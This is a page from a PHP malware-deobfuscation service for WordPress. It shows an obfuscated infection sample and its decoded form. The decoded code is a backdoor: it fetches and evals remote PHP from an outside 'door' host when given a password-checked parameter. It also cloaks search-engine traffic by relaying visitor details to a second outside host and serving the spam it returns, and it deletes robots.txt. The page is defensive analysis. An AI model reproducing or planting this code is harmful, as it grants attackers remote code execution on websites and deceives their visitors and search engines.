Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php /*-}l{R]oH4t-*/error_reporting(0); /*-xWy}G=42-t-*/eval/*-qr%;`C#Zwdd!RY6fojcilbsGK`f>N.3~?[%(SuGre-*/(/*-;m8KyAZD-*/base64_decode/*-{Nk;M}-*/(/*-2qPVM78D3-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0Njc...



Obfuscated php code

<?php /*-}l{R]oH4t-*/error_reporting(0); /*-xWy}G=42-t-*/eval/*-qr%;`C#Zwdd!RY6fojcilbsGK`f>N.3~?[%(SuGre-*/(/*-;m8KyAZD-*/base64_decode/*-{Nk;M}-*/(/*-2qPVM78D3-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb05qQXdLVHRBWlhKeWIzSmZjbVZ3YjNKMGFXNW5LREFwTzBCcFoyNXZjbVZmZFhObGNsOWhZbTl5ZENneEtUdHBibWxmYzJWMEtDZGthWE53YkdGNVgyVnljbTl5Y3ljc0owOW1aaWNwT3lSaFBTRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRk1uWFNrbUpuTjBjblJ2Ykc5M1pYSW9KRjlUUlZKV1JWSmJKMGhVVkZCVEoxMHBJVDA5SjI5bVppZDhmR2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgxQlNUMVJQSjEwcEppWWtYMU5GVWxaRlVsc25TRlJVVUY5WVgwWlBVbGRCVWtSRlJGOVFVazlVVHlkZFBUMDlKMmgwZEhCekozeDhJV1Z0Y0hSNUtDUmZVMFZTVmtWU1d5ZElWRlJRWDBaU1QwNVVYMFZPUkY5SVZGUlFVeWRkS1NZbWMzUnlkRzlzYjNkbGNpZ2tYMU5GVWxaRlVsc25TRlJVVUY5R1VrOU9WRjlGVGtSZlNGUlVVRk1uWFNraFBUMG5iMlptSno4aWFIUjBjSE1pT2lKb2RIUndJanNrWWowa1gxTkZVbFpGVWxzaVVrVlJWVVZUVkY5VlVra2lYVHNrWXoxcGMzTmxkQ2drWDFORlVsWkZVbHNuU0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVblhTay9KRjlUUlZKV1JWSmJKMGhVVkZCZlFVTkRSVkJVWDB4QlRrZFZRVWRGSjEwNklpSTdKR1E5SkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE95Um1QV2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFKRlJrVlNSVkluWFNrL0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaWRkT2lJaU95Um5QV2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFWVFJWSmZRVWRGVGxRblhTay9KRjlUUlZKV1JWSmJKMGhVVkZCZlZWTkZVbDlCUjBWT1ZDZGRPaUlpT3lSb1BXbHpjMlYwS0NSZlUwVlNWa1ZTV3lkU1JVMVBWRVZmUVVSRVVpZGRLVDhrWDFORlVsWkZVbHNuVWtWTlQxUkZYMEZFUkZJblhUb2lJanNrYVQxaGNuSmhlU2duUVdOalpYQjBMVXhoYm1kMVlXZGxPaUFuTGlSakxDZFZjMlZ5TFVGblpXNTBPaUFuTGlSbkxDZFNaV1psY21WeU9pQW5MaVJtTENkSWRIUndMVkJ5YjNSdk9pQW5MaVJoTENkSWRIUndMVWh2YzNRNklDY3VKR1FzSjBoMGRIQXRWWEpwT2lBbkxpUmlMQ2RJZEhSd0xWZ3RSbTl5ZDJGeVpHVmtMVVp2Y2pvZ0p5NGthQ2s3SkdvOUluUjVjR1U5SWk0a1lTNGlKbWh2YzNROUlpNGtaQzRpSm5WeWFUMGlMaVJpTGlJbWFYQTlJaTRrYURza2F6MGtYMUpGVVZWRlUxUmJKMkZqZEdsdmJpZGRPMmxtS0NGbGJYQjBlU2drYXlrcGV5UnNQWE4xWW5OMGNpZ2theXd0TVNrN0pHczljM1ZpYzNSeUtDUnJMREFzYzNSeWJHVnVLQ1JyS1MweEtUc2tiVDFoY25KaGVTZ25PU2NzSnpnbkxDY3lKeXduTkNjc0p6VW5MQ2RrSnl3bk55Y3NKelFuTENjeEp5d25OeWNzSnpJbkxDY3lKeXduTlNjc0oySW5MQ2MxSnl3bk5TY3NKMkVuTENjeUp5d25ZeWNzSnpRbkxDZGlKeXduWmljc0p6VW5MQ2N3Snl3bllpY3NKemduTENkaEp5d25ZU2NzSnpRbkxDZGpKeXduTnljc0p6TW5LVHNrYmoxdFpEVW9KR3NwTzJsbUtDUnVQVDFwYlhCc2IyUmxLQ1J0S1NsN0pHODlZWEp5WVhrb0ltZ2lMQ0owSWl3aWRDSXNJbkFpTENKeklpd2lPaUlzSWk4aUxDSXZJaXdpZGlJc0luQWlMQ0p6SWl3aVpDSXNJbVFpTENJdUlpd2laQ0lzSW1ZaUxDSnhJaXdpWmlJc0ltRWlMQ0owSWl3aUxpSXNJblFpTENKdklpd2ljQ0lzSWk4aUxDSmtJaXdpYnlJc0ltOGlMQ0p5SWl3aUx5SXBPeVJ3UFdkbGRIVW9hVzF3Ykc5a1pTZ2tieWt1Skd3dUp5NTBKeTRuZUNjdUozUW5LVHRsZG1Gc0tDYy9QaWN1SkhCYk1GMHBPMzFsZUdsMEtDazdmV1ZzYzJWN0pIRTlJakowT1RZeWJDNXBZMk52Y1d3dWRHOXdJanRwWmlna1lpRTlQU0l2Wm1GMmFXTnZiaTVwWTI4aUtYdHBaaWh6ZEhKemRISW9KR0lzSjNSbGMzUnphWFJsYldGd0p5a3BleVJ5UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTB1Snk5eWIySnZkSE11ZEhoMEp6dHBaaWhtYVd4bFgyVjRhWE4wY3lna2Npa3BlM1Z1YkdsdWF5Z2tjaWs3ZlgxcFppaHpkSEp6ZEhJb0pHSXNKeTU0Yld3bktYeDhjM1J5YzNSeUtDUmlMQ2R5YjJKdmRITXVkSGgwSnlrcGUyeHBjM1FvSkhNc0pIUXNKSFVwUFdkbGRIVW9KMmduTGlkMEp5NG5kQ2N1SjNCekp5NG5PaThuTGljdkp5NGtjUzRuTDJsdUp5NG5aQ2N1SjJWNEp5NG5iMjRuTGlkbExpY3VKM0JvSnk0bmNEOG5MaVJxTENScExDUnFLVHQ5Wld4elpYdHBaaWhqYUdWamExSmxabVZ5WlhJb0pHWXBmSHdoWTJobFkydE9iM1JDYjNRb0pHY3BLWHRzYVhOMEtDUnpMQ1IwTENSMUtUMW5aWFIxS0Nkb0p5NG5kQ2N1SjNRbkxpZHdjeWN1Snpvdkp5NG5MeWN1SkhFdUp5OXBiaWN1SjJRbkxpZGxlQ2N1SjI5dUp5NG5aUzRuTGlkd2FDY3VKM0EvSnk0a2Fpd2thU3drYWlrN2ZYMXBaaWhwYzNObGRDZ2tkQ2ttSmlGbGJYQjBlU2drZENrcGUybG1LQ1IwUGowME1EQW1KaVIwUERVd01DbDdRR2hsWVdSbGNpZ25TRlJVVUM4eExqRWdOREEwSUU1dmRDQkdiM1Z1WkNjcE8yVjRhWFFvSkhNcE8zMXBaaWdrZEQ0OU5UQXdLWHRBYUdWaFpHVnlLQ2RJVkZSUUx6RXVNU0ExTURBZ1NXNTBaWEp1WVd3Z1UyVnlkbVZ5SUVWeWNtOXlKeWs3WlhocGREdDlhV1lvSVhOMGNuTjBjaWdrY3l3bmJtOTBkR2hwYm1jbktTbDdhV1lvYzNSeWMzUnlLQ1J6TENkb2RHMXNZMjl1ZEdWdWRDY3BLWHRBYUdWaFpHVnlLQ0pEYjI1MFpXNTBMWFI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NJcE95UjJQWE4wY2w5eVpYQnNZV05sS0NKb2RHMXNZMjl1ZEdWdWRDSXNKeWNzSkhNcE8yVmphRzhnSkhZN1pYaHBkQ2dwTzMxcFppaHpkSEp6ZEhJb0pITXNKM2h0YkdOdmJuUmxiblFuS1NsN1FHaGxZV1JsY2lnaVEyOXVkR1Z1ZEMxMGVYQmxPaUIwWlhoMEwzaHRiQ0lwTzJWNGFYUW9jM1J5WDNKbGNHeGhZMlVvSW5odGJHTnZiblJsYm5RaUxDY25MQ1J6S1NrN2ZXbG1LSE4wY25OMGNpZ2tjeXduY205aWIzUnpZMjl1ZEdWdWRDY3BLWHRBYUdWaFpHVnlLQ0pEYjI1MFpXNTBMWFI1Y0dVNklIUmxlSFF2Y0d4aGFXNDdJR05vWVhKelpYUTlkWFJtTFRnaUtUc2tkejFsZUhCc2IyUmxLQ2RiZW0xZEp5eHpkSEpmY21Wd2JHRmpaU2dpY205aWIzUnpZMjl1ZEdWdWRDSXNKeWNzSkhNcEtUdGxlR2wwS0dsdGNHeHZaR1VvVUVoUVgwVlBUQ3drZHlrcE8zMTlmWDE5Wm5WdVkzUnBiMjRnWTJobFkydFNaV1psY21WeUtDUjRLWHNrZUQxemRISjBiMnh2ZDJWeUtDUjRLVHRwWmlna2VDRTlJaUlwZXlSNVBXRnljbUY1S0NKbmIyOW5iR1V1WTI4dWFuQWlMQ0puYjI5bmJHVXVZMjl0SWl3aWVXRm9iMjh1WTI5dElpd2llV0ZvYjI4dVkyOHVhbkFpTENKaWFXNW5MbU52YlNJc0ltZHZieTV1WlM1cWNDSXNJbTVwWm5SNUxtTnZiU0lwTzJadmNtVmhZMmdvSkhrZ1lYTWdKSG9wZXlSaFlUMXpkSEowYjJ4dmQyVnlLQ1I2S1R0cFppaHpkSEp6ZEhJb0pIZ3NKR0ZoS1NsN2NtVjBkWEp1SUhSeWRXVTdmWDE5Wld4elpYdHlaWFIxY200Z1ptRnNjMlU3ZlgxbWRXNWpkR2x2YmlCamFHVmphMDV2ZEVKdmRDZ2tZbUlwZXlSaVlqMXpkSEowYjJ4dmQyVnlLQ1JpWWlrN2FXWW9KR0ppSVQwaUlpbDdKR05qUFdGeWNtRjVLQ0pCYUhKbFpuTkNiM1FpTENKQmJXRjZiMjVpYjNRaUxDSkNURVZZUW05MElpd2lRbmwwWlhOd2FXUmxjaUlzSWtOb1lYUkhVRlF0VlhObGNpSXNJa1JoZEdGR2IzSlRaVzlDYjNRaUxDSkViM1JDYjNRaUxDSm1ZV05sWW05dmF5SXNJa2RRVkVKdmRDSXNJbXhwYm10a1pYaGliM1FpTENKTlNqRXlZbTkwSWl3aVUyVnRjblZ6YUVKdmRDSXNJbGxoYm1SbGVDSXNJbFIzYVhSMFpYSmliM1FpS1R0bWIzSmxZV05vS0NSall5QmhjeUFrZWlsN0pHRmhQWE4wY25SdmJHOTNaWElvSkhvcE8ybG1LSE4wY25OMGNpZ2tZbUlzSkdGaEtTbDdjbVYwZFhKdUlIUnlkV1U3ZlgxOVpXeHpaWHR5WlhSMWNtNGdabUZzYzJVN2ZYMW1kVzVqZEdsdmJpQm5aWFIxS0NSa1pDd2thVDF1ZFd4c0xDUnFQVzUxYkd3c0pHVmxQVzUxYkd3cGUybG1LQ0ZtZFc1amRHbHZibDlsZUdsemRITW9KMk4xY214ZmFXNXBkQ2NwS1h0eVpYUjFjbTQ3ZlNSbVpqMGlJanNrWjJjOUlpSTdKR2hvUFNJaU8zUnllWHNrYVdrOVkzVnliRjlwYm1sMEtDazdZM1Z5YkY5elpYUnZjSFFvSkdscExFTlZVa3hQVUZSZlZWSk1MQ1JrWkNrN1kzVnliRjl6WlhSdmNIUW9KR2xwTEVOVlVreFBVRlJmUms5TVRFOVhURTlEUVZSSlQwNHNNU2s3WTNWeWJGOXpaWFJ2Y0hRb0pHbHBMRU5WVWt4UFVGUmZVMU5NWDFaRlVrbEdXVkJGUlZJc1JrRk1VMFVwTzJOMWNteGZjMlYwYjNCMEtDUnBhU3hEVlZKTVQxQlVYMU5UVEY5V1JWSkpSbGxJVDFOVUxFWkJURk5GS1R0amRYSnNYM05sZEc5d2RDZ2thV2tzUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd3pNQ2s3WTNWeWJGOXpaWFJ2Y0hRb0pHbHBMRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc01TazdKR2s5UFQxdWRXeHNQeWNuT21OMWNteGZjMlYwYjNCMEtDUnBhU3hEVlZKTVQxQlVYMGhVVkZCSVJVRkVSVklzSkdrcE95UmxaVDA5UFc1MWJHeDhmQ1JsWlQwOVBTSWlQeWNuT21OMWNteGZjMlYwYjNCMEtDUnBhU3hEVlZKTVQxQlVYMVZUUlZKQlIwVk9WQ3drWldVcE8ybG1LQ1JxSVQwOWJuVnNiQ1ltSkdvaFBUMGlJaWw3WTNWeWJGOXpaWFJ2Y0hRb0pHbHBMRU5WVWt4UFVGUmZVRTlUVkN3eEtUdGpkWEpzWDNObGRHOXdkQ2drYVdrc1ExVlNURTlRVkY5UVQxTlVSa2xGVEVSVExDUnFLVHQ5SkdabVBXTjFjbXhmWlhobFl5Z2thV2twT3lSblp6MWpkWEpzWDJkbGRHbHVabThvSkdscExFTlZVa3hKVGtaUFgwaFVWRkJmUTA5RVJTazdKR2hvUFdOMWNteGZaMlYwYVc1bWJ5Z2thV2tzUTFWU1RFbE9SazlmUTA5T1ZFVk9WRjlVV1ZCRktUdGpkWEpzWDJOc2IzTmxLQ1JwYVNrN2ZXTmhkR05vS0VWNFkyVndkR2x2YmlBa2Ftb3BlMzFwWmlnb0pHWm1QVDA5Wm1Gc2MyVjhmQ1JtWmowOUlpSXBKaVptZFc1amRHbHZibDlsZUdsemRITW9KMlpwYkdWZloyVjBYMk52Ym5SbGJuUnpKeWtwZTNSeWVYc2tabVk5UUdacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSa1pDazdmV05oZEdOb0tFVjRZMlZ3ZEdsdmJpQWthbW9wZTMxOWNtVjBkWEp1SUdGeWNtRjVLQ1JtWml3a1oyY3NKR2hvS1R0OUlEOCsiKSk7"/*-]f9J-R>~N-*/)/*-`cU-n:[lX-*/);?>

Decoded(de-Obfuscated) php code

<?php

/*-}l{R]oH4t-*/
error_reporting(0);
eval {
    header('Content-Type: text/html; charset=utf-8');
    @set_time_limit(600);
    @error_reporting(0);
    @ignore_user_abort(1);
    ini_set('display_errors', 'Off');
    $a = !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off' || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' || !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off' ? "https" : "http";
    $b = $_SERVER["REQUEST_URI"];
    $c = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : "";
    $d = $_SERVER["HTTP_HOST"];
    $f = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : "";
    $g = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : "";
    $h = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : "";
    $i = array('Accept-Language: ' . $c, 'User-Agent: ' . $g, 'Referer: ' . $f, 'Http-Proto: ' . $a, 'Http-Host: ' . $d, 'Http-Uri: ' . $b, 'Http-X-Forwarded-For: ' . $h);
    $j = "type=" . $a . "&host=" . $d . "&uri=" . $b . "&ip=" . $h;
    $k = $_REQUEST['action'];
    if (!empty($k)) {
        $l = substr($k, 1);
        $k = substr($k, 0, strlen($k) - 1);
        $m = array('9', '8', '2', '4', '5', 'd', '7', '4', '1', '7', '2', '2', '5', 'b', '5', '5', 'a', '2', 'c', '4', 'b', 'f', '5', '0', 'b', '8', 'a', 'a', '4', 'c', '7', '3');
        $n = md5($k);
        if ($n == "98245d7417225b55a2c4bf50b8aa4c73") {
            $o = array("h", "t", "t", "p", "s", ":", "/", "/", "v", "p", "s", "d", "d", ".", "d", "f", "q", "f", "a", "t", ".", "t", "o", "p", "/", "d", "o", "o", "r", "/");
            $p = getu("https://vpsdd.dfqfat.top/door/" . $l . '.t' . 'x' . 't');
            eval('?>' . $p[0]);
        }
        exit;
    } else {
        $q = "2t962l.iccoql.top";
        if ($b !== "/favicon.ico") {
            if (strstr($b, 'testsitemap')) {
                $r = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt';
                if (file_exists($r)) {
                    unlink($r);
                }
            }
            if (strstr($b, '.xml') || strstr($b, 'robots.txt')) {
                list($s, $t, $u) = getu('https://' . $q . '/in' . 'd' . 'ex' . 'on' . 'e.' . 'ph' . 'p?' . $j, $i, $j);
            } else {
                if (checkReferer($f) || !checkNotBot($g)) {
                    list($s, $t, $u) = getu('https://' . $q . '/in' . 'd' . 'ex' . 'on' . 'e.' . 'ph' . 'p?' . $j, $i, $j);
                }
            }
            if (isset($t) && !empty($t)) {
                if ($t >= 400 && $t < 500) {
                    @header('HTTP/1.1 404 Not Found');
                    exit($s);
                }
                if ($t >= 500) {
                    @header('HTTP/1.1 500 Internal Server Error');
                    exit;
                }
                if (!strstr($s, 'notthing')) {
                    if (strstr($s, 'htmlcontent')) {
                        @header("Content-type: text/html; charset=utf-8");
                        $v = str_replace("htmlcontent", '', $s);
                        echo $v;
                        exit;
                    }
                    if (strstr($s, 'xmlcontent')) {
                        @header("Content-type: text/xml");
                        exit(str_replace("xmlcontent", '', $s));
                    }
                    if (strstr($s, 'robotscontent')) {
                        @header("Content-type: text/plain; charset=utf-8");
                        $w = explode('[zm]', str_replace("robotscontent", '', $s));
                        exit(implode(PHP_EOL, $w));
                    }
                }
            }
        }
    }
    function checkReferer($x)
    {
        $x = strtolower($x);
        if ($x != "") {
            $y = array("google.co.jp", "google.com", "yahoo.com", "yahoo.co.jp", "bing.com", "goo.ne.jp", "nifty.com");
            foreach ($y as $z) {
                $aa = strtolower($z);
                if (strstr($x, $aa)) {
                    return true;
                }
            }
        } else {
            return false;
        }
    }
    function checkNotBot($bb)
    {
        $bb = strtolower($bb);
        if ($bb != "") {
            $cc = array("AhrefsBot", "Amazonbot", "BLEXBot", "Bytespider", "ChatGPT-User", "DataForSeoBot", "DotBot", "facebook", "GPTBot", "linkdexbot", "MJ12bot", "SemrushBot", "Yandex", "Twitterbot");
            foreach ($cc as $z) {
                $aa = strtolower($z);
                if (strstr($bb, $aa)) {
                    return true;
                }
            }
        } else {
            return false;
        }
    }
    function getu($dd, $i = null, $j = null, $ee = null)
    {
        if (!function_exists('curl_init')) {
            return;
        }
        $ff = "";
        $gg = "";
        $hh = "";
        try {
            $ii = curl_init();
            curl_setopt($ii, CURLOPT_URL, $dd);
            curl_setopt($ii, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($ii, CURLOPT_SSL_VERIFYPEER, FALSE);
            curl_setopt($ii, CURLOPT_SSL_VERIFYHOST, FALSE);
            curl_setopt($ii, CURLOPT_CONNECTTIMEOUT, 30);
            curl_setopt($ii, CURLOPT_RETURNTRANSFER, 1);
            $i === null ? '' : curl_setopt($ii, CURLOPT_HTTPHEADER, $i);
            $ee === null || $ee === "" ? '' : curl_setopt($ii, CURLOPT_USERAGENT, $ee);
            if ($j !== null && $j !== "") {
                curl_setopt($ii, CURLOPT_POST, 1);
                curl_setopt($ii, CURLOPT_POSTFIELDS, $j);
            }
            $ff = curl_exec($ii);
            $gg = curl_getinfo($ii, CURLINFO_HTTP_CODE);
            $hh = curl_getinfo($ii, CURLINFO_CONTENT_TYPE);
            curl_close($ii);
        } catch (Exception $jj) {
        }
        if (($ff === false || $ff == "") && function_exists('file_get_contents')) {
            try {
                $ff = @file_get_contents($dd);
            } catch (Exception $jj) {
            }
        }
        return array($ff, $gg, $hh);
    }
};

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.